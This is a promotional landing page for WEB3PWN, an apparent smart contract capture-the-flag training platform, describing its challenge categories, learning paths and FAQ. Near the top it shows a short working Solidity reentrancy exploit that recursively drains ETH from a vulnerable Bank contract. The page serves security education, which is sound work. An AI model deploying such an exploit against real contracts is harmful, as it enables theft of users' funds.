🛡 Web3 Hacking Platform

Hack Smart Contracts.
Exploit Every Flaw.

Find and exploit real vulnerabilities in Solidity smart contracts. Write exploit code, drain contracts, and sharpen your Web3 hacking skills.

Start Hacking Free See How It Works
0+
Challenges
0
Categories
0%
Hands-On 
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "./Bank.sol";

contract Exploit {
    Bank public target;

    constructor(address _target) {
        target = Bank(_target);
    }

    function attack() external payable {
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    receive() external payable {
        if (address(target).balance >= 1 ether)
            target.withdraw();
    }
}
A reentrancy exploit contract that recursively drains ETH from a vulnerable Bank contract
Why WEB3PWN

Find Vulnerabilities by Exploiting Them

The most effective way to understand smart contract vulnerabilities is to exploit them yourself. WEB3PWN gives you a sandboxed environment to write real Solidity exploit code against vulnerable contracts.

Real Exploit Development

Write actual Solidity exploit contracts against vulnerable targets. No multiple choice — you write the code that drains the contract.

Browser-Based Code Editor

Write, compile, and test your exploits directly in the browser. No local setup, no Foundry, no Hardhat install — just open and start hacking.

Sandboxed Execution

Every exploit runs in an isolated Docker container with Hardhat. Safe, reproducible, and instantly validated against automated test suites.

Progressive Exploit Curriculum

Start with Solidity fundamentals, then advance through real-world vulnerability categories. Each track builds on the last.

Ranks & Leaderboard

Earn points for every challenge solved. Rise through ranks from Novice to Overlord and compete on the global leaderboard.

Modern Solidity 0.8.x

All challenges use Solidity 0.8.19+ with up-to-date vulnerability patterns relevant to today's DeFi and NFT ecosystem.

Exploit Academy

11 Attack Vectors. 55+ Targets. Infinite Exploits.

From Solidity basics to advanced attack chains, every category covers a real vulnerability class found in production smart contracts.

Solidity Starter

Master Solidity fundamentals: arrays, functions, structs, mappings, and data locations. 10 interactive challenges to build your foundation.

Beginner

Reentrancy Attacks

Exploit the most infamous smart contract vulnerability. Drain banks, hijack NFT airdrops, and chain recursive callbacks across 7 challenges.

Advanced

Access Control

Bypass broken authorization. Claim ownership, steal tokens, and exploit permission flaws in 6 challenges.

Intermediate

Gas Optimization

Write gas-efficient Solidity. Learn storage patterns, caching, struct packing, and iteration tricks across 7 challenges.

Intermediate

Upgradeability Exploits

Attack proxy patterns and upgradeable contracts. Storage collisions, clashing selectors, and factory takeovers in 6 challenges.

Advanced

Denial of Service

Block auctions, freeze staking, and halt ICOs. Learn how smart contracts can be permanently griefed in 5 challenges.

Intermediate

Signature Attacks

Forge signatures, replay transactions, and break verification logic in on-chain protocols across 3 challenges.

Advanced

tx.origin Exploits

Exploit the dangerous tx.origin pattern to phish users and steal funds from vulnerable vaults and token contracts.

Intermediate

Weak Randomness

Predict "random" outcomes on-chain. Rig lotteries and exploit weak entropy sources like block.timestamp and blockhash.

Intermediate

DeFi Missions

Complex multi-contract scenarios inspired by real-world DeFi exploits like Thirdweb and clone attacks. The ultimate test.

Expert
Getting Started

Hack Your First Contract in 3 Minutes

No local toolchain required. Sign up, pick a challenge, and start writing exploits immediately.

Choose a Challenge

Browse 55+ smart contract challenges organized by vulnerability type and difficulty. Each one presents a vulnerable Solidity contract and a clear exploitation objective.

Write Your Exploit

Study the vulnerable contract, identify the flaw, and write a Solidity exploit contract directly in the browser-based code editor. No local setup needed.

Execute & Verify

Hit execute. Your Solidity exploit compiles and runs against the target in a sandboxed Docker environment. Automated Hardhat tests verify if you successfully exploited the vulnerability.

Attack Paths

From Zero to Full Exploit

Structured learning paths that take you from writing your first Solidity line to chaining advanced multi-contract exploits.

Beginner

Solidity Foundations

New to Solidity? Start here. Understand the language you'll be attacking — data types, functions, storage patterns, and contract architecture.

  • Value Types & Data Locations
  • Functions & Modifiers
  • Arrays, Mappings & Structs
  • Contract Layout Patterns
10 challenges
Intermediate

Vulnerability Hunter

Know Solidity basics? Dive into common vulnerability classes and learn to identify and exploit real-world smart contract attack patterns.

  • Access Control & tx.origin
  • Denial of Service Attacks
  • Weak Randomness Exploits
  • Gas Optimization Techniques
22 challenges
Advanced

Exploit Specialist

Ready for the deep end? Chain reentrancy variants, break proxies, forge signatures, and pwn complex multi-contract targets.

  • Reentrancy Variants (7 challenges)
  • Upgradeable Contract Exploits
  • Signature Verification Attacks
  • Real-World DeFi Missions
19 challenges
About the Platform

Why Smart Contract Security Matters

Billions Lost to Smart Contract Exploits

Since 2020, over $6 billion has been stolen through smart contract vulnerabilities in DeFi protocols, bridges, and NFT projects. Reentrancy attacks, access control flaws, and logic bugs continue to be exploited on Ethereum, BSC, Polygon, Arbitrum, and other EVM-compatible chains. Understanding how these exploits work is essential for anyone building or auditing in Web3.

WEB3PWN recreates real vulnerability patterns in a safe, sandboxed environment. Each challenge is a self-contained Hardhat project with a vulnerable Solidity contract and an automated test suite. You write the exploit, the platform verifies it — no testnets, no gas costs, no setup.

Built for Hackers, Not Classrooms

WEB3PWN is not a video course or a lecture series. It is a hands-on smart contract CTF platform where every challenge requires writing working Solidity exploit code. The challenges range from basic Solidity fundamentals to advanced multi-contract DeFi attack scenarios inspired by real incidents like the DAO hack, Thirdweb vulnerability, and various proxy storage collision exploits.

Whether you are preparing for a smart contract audit, practicing for blockchain bug bounties on Immunefi or HackerOne, or studying for Web3 security certifications, WEB3PWN provides the practical exploitation experience that theory alone cannot match.

FAQ

Frequently Asked Questions

What is WEB3PWN?

WEB3PWN is an interactive Web3 hacking platform where you find and exploit vulnerabilities in smart contracts by writing real Solidity exploit code. It features 55+ challenges across 11 categories including reentrancy, access control, gas optimization, and more. Think of it as a CTF platform built specifically for smart contract exploitation.

Do I need prior Solidity experience?

No! WEB3PWN includes a Solidity Starter track with 10 foundational challenges covering arrays, functions, data locations, and more. You can learn Solidity fundamentals before tackling the exploit challenges. That said, basic programming knowledge is helpful.

Do I need to install anything locally?

No. Everything runs in the browser. You write your exploit code in our online editor, and it's compiled and executed in a sandboxed server environment using Hardhat. No local toolchain, no wallet, no gas fees.

How do the smart contract challenges work?

Each challenge presents a vulnerable smart contract. You write an Exploit.sol contract in the browser-based code editor. Your exploit is compiled and tested against the vulnerable contract using Hardhat in a sandboxed Docker environment. If your exploit passes all tests, the challenge is marked as solved and you earn points toward your rank.

What smart contract vulnerability categories are covered?

WEB3PWN covers the most critical smart contract vulnerability classes: reentrancy attacks (7 challenges), access control vulnerabilities (6 challenges), tx.origin exploits (2 challenges), insecure randomness (2 challenges), denial of service (5 challenges), signature verification flaws (3 challenges), upgradeability issues (6 challenges), gas optimization (7 challenges), and complex multi-contract DeFi missions (3 challenges).

Is WEB3PWN free?

Yes, WEB3PWN is completely free to use. Create an account and start exploiting smart contract vulnerabilities right away. All 55+ challenges are available at no cost.

How is WEB3PWN different from Ethernaut or Damn Vulnerable DeFi?

Unlike Ethernaut or Damn Vulnerable DeFi which require local setup with Foundry or Hardhat, WEB3PWN runs entirely in your browser. You write Solidity exploit code in an online editor and it compiles and executes in a sandboxed environment. WEB3PWN also features a progressive curriculum from Solidity basics to advanced exploits, a ranking system, and a global leaderboard.

Ready to Exploit Your First
Smart Contract?

Join hackers and bug bounty hunters who are sharpening their Web3 exploit skills. Start with the basics or jump straight into advanced attacks.

Create Free Account